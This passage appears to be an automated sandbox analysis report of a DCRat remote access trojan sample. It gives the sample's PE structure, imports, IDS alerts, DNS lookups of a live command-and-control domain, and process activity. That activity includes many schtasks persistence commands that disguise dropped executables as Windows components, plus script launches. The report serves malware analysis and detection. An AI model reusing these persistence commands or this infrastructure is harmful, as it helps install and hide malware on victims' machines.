                                                          call 00007FBCDCE7BDB8h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FBCDCE7EBDCh
                                                          int3
                                                          jmp 00007FBCDCE80677h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]

                                                          Rich Headers

                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                          PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                          RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                          RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                          RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                          RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                          RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                          RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                          RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                          RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                                          RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                                          RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                                          RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                                          RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                                          RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                                          RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                                          RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                                          RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                                          RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                                          RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                                          RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                                          RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                                          RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                                          RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                                          RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                                          RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                                          RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                                          Imports

                                                          DLLImport
                                                          KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                          gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishUnited States

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2025-01-13T13:26:33.309955+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449736104.21.16.180TCP
                                                          2025-01-13T13:26:44.466245+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449738104.21.16.180TCP
                                                          2025-01-13T13:26:49.310116+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449739104.21.16.180TCP
                                                          2025-01-13T13:26:52.200683+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449740104.21.16.180TCP
                                                          2025-01-13T13:26:55.607858+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449741104.21.16.180TCP
                                                          2025-01-13T13:27:13.763281+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449827104.21.16.180TCP
                                                          2025-01-13T13:27:21.935238+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449880104.21.16.180TCP
                                                          2025-01-13T13:27:24.482302+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449897104.21.16.180TCP
                                                          2025-01-13T13:27:28.654062+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449926104.21.16.180TCP
                                                          2025-01-13T13:27:46.201101+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450012104.21.16.180TCP
                                                          2025-01-13T13:27:54.216801+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450013104.21.16.180TCP
                                                          2025-01-13T13:27:56.763749+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450014104.21.16.180TCP
                                                          2025-01-13T13:28:02.748384+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450015104.21.16.180TCP
                                                          2025-01-13T13:28:05.513787+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450016104.21.16.180TCP
                                                          2025-01-13T13:28:07.654435+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.450017104.21.16.180TCP

                                                          Network Port Distribution

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jan 13, 2025 13:26:32.802299023 CET6263653192.168.2.41.1.1.1
                                                          Jan 13, 2025 13:26:32.816339016 CET53626361.1.1.1192.168.2.4

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Jan 13, 2025 13:26:32.802299023 CET192.168.2.41.1.1.10xddc1Standard query (0)77777cm.nyashtyan.inA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.16.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.64.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.48.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.112.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.32.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.80.1A (IP address)IN (0x0001)false
                                                          Jan 13, 2025 13:26:32.816339016 CET1.1.1.1192.168.2.40xddc1No error (0)77777cm.nyashtyan.in104.21.96.1A (IP address)IN (0x0001)false

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:07:25:59
                                                          Start date:13/01/2025
                                                          Path:C:\Users\user\Desktop\SPISOK_DENEG.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\SPISOK_DENEG.exe"
                                                          Imagebase:0xd0000
                                                          File size:1'166'640 bytes
                                                          MD5 hash:490AA1E56FAB47858D780A9FDBAFB5BF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1672714236.0000000007058000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1671665408.000000000674F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000003.1672343604.0000000007053000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:07:26:00
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProviderserverruntimeperfSvc\4oe8qKx4BC4jNir9oLrOplwqP.vbe"
                                                          Imagebase:0x910000
                                                          File size:147'456 bytes
                                                          MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\system32\cmd.exe /c ""C:\ProviderserverruntimeperfSvc\wnVkTofZircZrFhWJh5AKDNhgeSRpsYNieNXBbC85wZu.bat" "
                                                          Imagebase:0x240000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:3
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:07:26:06
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ProviderserverruntimeperfSvc/ChainPortsurrogate.exe"
                                                          Imagebase:0xea0000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000000.1740538783.0000000000EA2000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmon" /sc ONLOGON /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:7
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 6 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ProviderserverruntimeperfSvc\ctfmon.exe
                                                          Imagebase:0xe90000
                                                          File size:844'800 bytes
                                                          MD5 hash:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProviderserverruntimeperfSvc\ctfmon.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 78%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:9
                                                          Start time:07:26:08
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                                          Imagebase:0x7ff7e9220000
                                                          File size:2'759'232 bytes
                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:07:26:09
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:07:26:09
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6FF6.tmp" "c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP"
                                                          Imagebase:0x7ff768590000
                                                          File size:52'744 bytes
                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:12
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:13
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:14
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\jdownloader\config\explorer.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:15
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:16
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:17
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Documents\dllhost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:18
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 11 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:19
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:20
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\debug\backgroundTaskHost.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:21
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 12 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:22
                                                          Start time:07:26:10
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZ" /sc ONLOGON /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:23
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "EbnrVuXczrPqjyiJGoZE" /sc MINUTE /mo 8 /tr "'C:\Recovery\EbnrVuXczrPqjyiJGoZ.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          General

                                                          Target ID:24
                                                          Start time:07:26:11
                                                          Start date:13/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
